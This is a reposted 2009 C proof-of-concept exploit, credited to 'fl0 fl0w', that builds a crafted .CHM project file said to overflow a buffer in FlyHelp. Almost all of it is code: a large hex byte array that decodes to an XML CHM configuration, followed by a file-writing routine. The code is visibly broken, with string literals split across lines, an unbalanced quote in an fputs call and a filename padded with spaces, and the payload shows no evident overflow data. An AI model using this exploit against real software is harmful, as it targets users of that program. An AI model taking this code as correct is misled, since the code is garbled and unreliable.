Home / os / win10

flyhelp-overflow.txt

Posted on 21 July 2009

/*
<<Name >>flyhelp.cpp
FlyHelp .CHM File Buffer Overflo POC
<<Credits >>fl0 fl0w
<<Website >>http://www.sploitz.10001mb.com
*/

/*
<<DEMO >>
C:Documents and SettingsStefanDesktopNew Folder1>flyhelp.exe

C:Documents and SettingsStefanDesktopNew Folder1>flyhelp.exe -file test

***************************************************************************
FlyHelp .CHM File Buffer Overflo POC
Usage is flyhelp.exe -file filename
Credits fl0 fl0w
***************************************************************************
File build !

*/
#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <assert.h>
#include <windows.h>

#define     SIZE 100000

char rawData[1471] =
{
0x3C, 0x3F, 0x78, 0x6D, 0x6C, 0x20, 0x76, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E, 0x3D, 0x22, 0x31,
0x2E, 0x30, 0x22, 0x20, 0x65, 0x6E, 0x63, 0x6F, 0x64, 0x69, 0x6E, 0x67, 0x3D, 0x22, 0x57, 0x69,
0x6E, 0x64, 0x6F, 0x77, 0x73, 0x2D, 0x31, 0x32, 0x35, 0x32, 0x22, 0x20, 0x3F, 0x3E, 0x0D, 0x0A,
0x3C, 0x58, 0x4D, 0x4C, 0x43, 0x6F, 0x6E, 0x66, 0x69, 0x67, 0x3E, 0x3C, 0x69, 0x6E, 0x66, 0x6F,
0x3E, 0x43, 0x48, 0x4D, 0x20, 0x50, 0x72, 0x6F, 0x6A, 0x65, 0x63, 0x74, 0x3C, 0x2F, 0x69, 0x6E,
0x66, 0x6F, 0x3E, 0x0D, 0x0A, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x56, 0x65, 0x72, 0x73, 0x69,
0x6F, 0x6E, 0x22, 0x3E, 0x32, 0x30, 0x38, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x3C, 0x67, 0x20,
0x6E, 0x3D, 0x22, 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20,
0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x43, 0x6F, 0x75, 0x6E, 0x74, 0x22, 0x3E, 0x30, 0x3C, 0x2F,
0x70, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22,
0x46, 0x69, 0x6C, 0x65, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
0x43, 0x6F, 0x75, 0x6E, 0x74, 0x22, 0x3E, 0x30, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F,
0x67, 0x3E, 0x0D, 0x0A, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x4F, 0x70, 0x74, 0x69, 0x6F, 0x6E,
0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x48, 0x50, 0x22,
0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x4F, 0x70, 0x74, 0x69, 0x6F,
0x6E, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x54,
0x69, 0x74, 0x6C, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C,
0x70, 0x20, 0x6E, 0x3D, 0x22, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6C, 0x74, 0x20, 0x74, 0x6F, 0x70,
0x69, 0x63, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20,
0x6E, 0x3D, 0x22, 0x4C, 0x61, 0x6E, 0x67, 0x75, 0x61, 0x67, 0x65, 0x22, 0x3E, 0x30, 0x78, 0x34,
0x30, 0x39, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D,
0x22, 0x46, 0x75, 0x6C, 0x6C, 0x2D, 0x74, 0x65, 0x78, 0x74, 0x20, 0x73, 0x65, 0x61, 0x72, 0x63,
0x68, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x2F, 0x67, 0x3E,
0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77,
0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x4D, 0x61,
0x69, 0x6E, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
0x50, 0x6F, 0x73, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x5B, 0x38, 0x30, 0x2C, 0x36, 0x30,
0x2C, 0x36, 0x34, 0x30, 0x2C, 0x34, 0x38, 0x30, 0x5D, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x53, 0x74, 0x6F, 0x72, 0x65, 0x50, 0x6F,
0x73, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4E, 0x61, 0x76, 0x69, 0x67, 0x61, 0x74,
0x69, 0x6F, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E,
0x74, 0x73, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x74, 0x65, 0x6D, 0x70, 0x2E, 0x68,
0x68, 0x63, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E,
0x3D, 0x22, 0x49, 0x6E, 0x64, 0x65, 0x78, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C,
0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x53,
0x65, 0x61, 0x72, 0x63, 0x68, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70,
0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x41, 0x64, 0x76,
0x53, 0x65, 0x61, 0x72, 0x63, 0x68, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F,
0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x46, 0x61,
0x76, 0x6F, 0x72, 0x69, 0x74, 0x65, 0x73, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C,
0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x44,
0x65, 0x66, 0x61, 0x75, 0x6C, 0x74, 0x54, 0x61, 0x62, 0x22, 0x3E, 0x30, 0x3C, 0x2F, 0x70, 0x3E,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x54, 0x61, 0x62, 0x73,
0x50, 0x6F, 0x73, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x30, 0x3C, 0x2F, 0x70, 0x3E, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x69, 0x64, 0x65, 0x53,
0x68, 0x6F, 0x77, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x42, 0x61, 0x63, 0x6B,
0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x46, 0x6F, 0x72, 0x77, 0x61, 0x72, 0x64,
0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x53, 0x74, 0x6F, 0x70, 0x42, 0x75, 0x74,
0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C,
0x70, 0x20, 0x6E, 0x3D, 0x22, 0x52, 0x65, 0x66, 0x72, 0x65, 0x73, 0x68, 0x42, 0x75, 0x74, 0x74,
0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70,
0x20, 0x6E, 0x3D, 0x22, 0x46, 0x6F, 0x6E, 0x74, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E,
0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
0x50, 0x72, 0x69, 0x6E, 0x74, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70,
0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4F, 0x70, 0x74,
0x69, 0x6F, 0x6E, 0x73, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4C, 0x6F, 0x63, 0x61,
0x74, 0x65, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x6F, 0x6D, 0x65, 0x42, 0x75,
0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,
0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x6F, 0x6D, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70,
0x31, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x31, 0x22, 0x3E,
0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
0x4A, 0x75, 0x6D, 0x70, 0x31, 0x43, 0x61, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F,
0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75,
0x6D, 0x70, 0x32, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x32,
0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E,
0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x32, 0x43, 0x61, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E,
0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22,
0x4E, 0x65, 0x78, 0x74, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x50, 0x72, 0x65, 0x76,
0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x41, 0x75, 0x74, 0x6F, 0x53, 0x79, 0x6E, 0x63,
0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E,
0x3D, 0x22, 0x41, 0x75, 0x74, 0x6F, 0x53, 0x68, 0x6F, 0x77, 0x48, 0x69, 0x64, 0x65, 0x50, 0x61,
0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70,
0x20, 0x6E, 0x3D, 0x22, 0x48, 0x69, 0x64, 0x65, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x43, 0x61,
0x70, 0x74, 0x69, 0x6F, 0x6E, 0x73, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x43, 0x6C, 0x6F, 0x73, 0x65, 0x64, 0x50, 0x61,
0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70,
0x20, 0x6E, 0x3D, 0x22, 0x50, 0x61, 0x6E, 0x65, 0x57, 0x69, 0x64, 0x74, 0x68, 0x22, 0x3E, 0x3C,
0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x67,
0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x58, 0x4D, 0x4C, 0x43, 0x6F, 0x6E, 0x66, 0x69, 0x67, 0x3E,
} ;

class EXPLOIT {
public:

int check (char *, char *);
void Usage (char *);
};

static int  Poz = 1;
static int  Neg = 0;

int i;

char Name [SIZE];
char NeWbuff [SIZE];


int main (int argc, char *argv [])

{

EXPLOIT VIDEO;
VIDEO.Usage(argv [0]);
if(argc < 2) {
VIDEO.Usage(argv [0]);
exit(0);
}
if(VIDEO.check(argv [1], "-file") == Neg) {
fprintf(stdout , " Incorect input ");
printf(" 	..Usage is %s -file filename.. 
", Name);
exit(0);
}
FILE *f;
strcpy(Name, argv [2]);
strcat(Name, " .chm ");
f = fopen (Name, "w");
assert( f != NULL);
strncpy(NeWbuff  , rawData , sizeof(rawData));
fputs("FILE "", f);
fprintf( f, " %s ", NeWbuff);
fprintf( stdout , "File build ! ");
exit(0);
getchar();
return 0;
}
int EXPLOIT::check(char *Arg_, char *_Arg)
{
if(strcmp(Arg_, _Arg) == 0)
return Poz;
return Neg;
}
void EXPLOIT::Usage(char *Name)
{
system("cls");
printf("***************************************************************************
");
printf("FlyHelp .CHM File Buffer Overflo POC
");
printf(" 	Usage is %s -file filename
", Name);
fprintf(stdout , "Credits fl0 fl0w
");
printf("***************************************************************************
");
}

 

TOP

Malware :

Exploits :